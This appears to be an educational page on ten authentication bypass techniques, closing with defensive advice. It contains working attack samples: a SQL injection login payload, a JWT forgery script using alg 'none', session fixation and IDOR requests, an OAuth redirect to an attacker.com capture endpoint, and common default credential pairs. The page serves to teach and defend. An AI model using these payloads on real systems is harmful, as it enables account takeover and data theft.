Skip to content

Authentication Bypass Attack Vectors

Authentication bypass vulnerabilities can be exploited through various attack vectors. Understanding these vectors is essential for both offensive security testing and defensive measures.

1. Weak Password Policies

Description

Weak password policies allow users to set easily guessable passwords, making it easier for attackers to brute force or use credential stuffing attacks.

Real-World Example

In 2019, a major airline suffered a breach where attackers used weak passwords to gain access to customer accounts. The airline's password policy did not enforce complexity requirements, allowing passwords like "123456" and "password" to be used.

Code Example: Weak Password Validation

# Vulnerable password validation
def validate_password(password):
    # Only checks length, no complexity requirements
    return len(password) >= 6

# Secure password validation
def secure_validate_password(password):
    import re
    # Require at least 8 characters, one uppercase, one lowercase, one digit, one special character
    if len(password) < 8:
        return False
    if not re.search(r'[A-Z]', password):
        return False
    if not re.search(r'[a-z]', password):
        return False
    if not re.search(r'[0-9]', password):
        return False
    if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
        return False
    return True

2. Session Fixation

Description

Session fixation occurs when an attacker forces a user to use a specific session ID, allowing the attacker to hijack the user's session after authentication.

Real-World Example

A popular e-commerce platform was vulnerable to session fixation, allowing attackers to steal user sessions and perform unauthorized transactions.

Exploitation Code

import requests

# Attacker sets the session ID
session_id = "attacker_controlled_session"
cookies = {'sessionid': session_id}

# Victim logs in with the fixed session ID
login_data = {'username': 'victim', 'password': 'victim_password'}
response = requests.post('https://vulnerable-site.com/login', data=login_data, cookies=cookies)

# Attacker now has access to the victim's session
response = requests.get('https://vulnerable-site.com/dashboard', cookies=cookies)
print(response.text)  # Access to victim's dashboard

3. Insecure Direct Object References (IDOR)

Description

IDOR occurs when an application provides direct access to objects based on user-supplied input, allowing attackers to bypass authorization and access unauthorized data.

Real-World Example

A healthcare application exposed patient records by allowing users to manipulate the patient ID parameter in the URL, leading to unauthorized access to sensitive medical information.

Exploitation Example

# Normal user access
GET /api/patient/12345 HTTP/1.1
Host: healthcare-app.com
Authorization: Bearer user_token

# Attacker manipulates the patient ID
GET /api/patient/67890 HTTP/1.1
Host: healthcare-app.com
Authorization: Bearer user_token

4. SQL Injection in Authentication

Description

SQL injection in authentication mechanisms allows attackers to bypass login forms by manipulating SQL queries.

Real-World Example

A government portal had a SQL injection vulnerability in its login form, allowing attackers to bypass authentication using SQL injection payloads.

Exploitation Payload

username: admin' OR '1'='1'--
password: anything

Vulnerable Code

# Vulnerable authentication code
def authenticate(username, password):
    query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    result = execute_query(query)
    return len(result) > 0

# Secure authentication code using parameterized queries
def secure_authenticate(username, password):
    query = "SELECT * FROM users WHERE username = %s AND password = %s"
    result = execute_query(query, (username, password))
    return len(result) > 0

5. JWT Token Manipulation

Description

JSON Web Tokens (JWT) can be manipulated if not properly validated, allowing attackers to bypass authentication by modifying token claims.

Real-World Example

A financial application used JWT for authentication but did not validate the token signature, allowing attackers to modify the token and gain admin privileges.

Exploitation Code

import jwt

# Original token
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwidXNlcm5hbWUiOiJqb2huZG9lIiwiaWF0IjoxNTE2MjM5MDIyLCJyb2xlIjoidXNlciJ9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"

# Decode token without verification (if app doesn't verify signature)
decoded = jwt.decode(token, options={"verify_signature": False})
decoded['role'] = 'admin'  # Modify role

# Create new token with modified claims
new_token = jwt.encode(decoded, key='', algorithm='none')
print(new_token)

6. Password Reset Functionality Bypass

Description

Flaws in password reset functionality can allow attackers to reset passwords of other users or bypass the reset process entirely.

Real-World Example

A social media platform had a password reset vulnerability where attackers could reset any user's password by manipulating the reset token or using predictable token generation.

Exploitation Example

# Normal reset request
POST /reset-password HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/json

{"email": "victim@example.com"}

# Attacker manipulates the email parameter
POST /reset-password HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/json

{"email": "attacker@example.com", "victim_email": "victim@example.com"}

7. OAuth and SSO Bypass

Description

OAuth and Single Sign-On (SSO) implementations can have vulnerabilities that allow attackers to bypass authentication or impersonate users.

Real-World Example

A cloud service provider had an OAuth implementation flaw that allowed attackers to obtain access tokens for any user by manipulating redirect URIs.

Exploitation Code

# Normal OAuth flow
GET /oauth/authorize?client_id=123&redirect_uri=https://client-app.com/callback&response_type=code

# Attacker manipulates redirect_uri
GET /oauth/authorize?client_id=123&redirect_uri=https://attacker.com/capture&response_type=code

8. Multi-Factor Authentication (MFA) Bypass

Description

MFA bypass vulnerabilities occur when attackers can circumvent the second factor of authentication, such as through session manipulation or code reuse.

Real-World Example

A banking application had an MFA bypass where attackers could reuse MFA codes or bypass the MFA step entirely by manipulating session states.

Exploitation Example

# Normal MFA flow
POST /verify-mfa HTTP/1.1
Host: bank-app.com
Content-Type: application/json
Cookie: session=valid_session

{"code": "123456"}

# Attacker bypasses MFA by directly accessing post-MFA endpoint
GET /dashboard HTTP/1.1
Host: bank-app.com
Cookie: session=valid_session

9. API Authentication Bypass

Description

API endpoints may have inadequate authentication checks, allowing attackers to access sensitive data or perform actions without proper credentials.

Real-World Example

A mobile app API did not properly validate authentication tokens for certain endpoints, allowing unauthorized access to user data.

Exploitation Code

import requests

# Unauthenticated access to API endpoint
response = requests.get('https://api.vulnerable-app.com/users/me')
print(response.json())  # Returns user data without authentication

# Bypass using empty or invalid tokens
headers = {'Authorization': 'Bearer '}
response = requests.get('https://api.vulnerable-app.com/users/me', headers=headers)

10. Default Credentials and Backdoors

Description

Applications may have default credentials or hidden backdoors that attackers can use to gain access.

Real-World Example

A IoT device manufacturer shipped devices with hardcoded admin credentials, allowing attackers to take control of devices worldwide.

Common Default Credentials

# Router default credentials
admin:admin
admin:password
root:root
administrator:(empty)

# Database default credentials
sa:sa
root:root
admin:admin

Defense Strategies

For each attack vector, implement corresponding defensive measures:

  1. Strong Password Policies: Enforce complexity requirements and regular password changes.
  2. Secure Session Management: Regenerate session IDs after login and implement proper logout functionality.
  3. Input Validation: Validate and sanitize all user inputs to prevent injection attacks.
  4. Proper Token Validation: Always validate JWT signatures and implement token expiration.
  5. Secure Password Reset: Use unpredictable tokens and verify user identity through multiple factors.
  6. OAuth/SSO Security: Validate redirect URIs and implement proper scope validation.
  7. MFA Implementation: Ensure MFA cannot be bypassed and codes are time-limited.
  8. API Security: Implement proper authentication and authorization checks for all API endpoints.
  9. Eliminate Defaults: Change default credentials and remove any backdoors before deployment.

By understanding these attack vectors, security professionals can better protect applications and systems from authentication bypass vulnerabilities.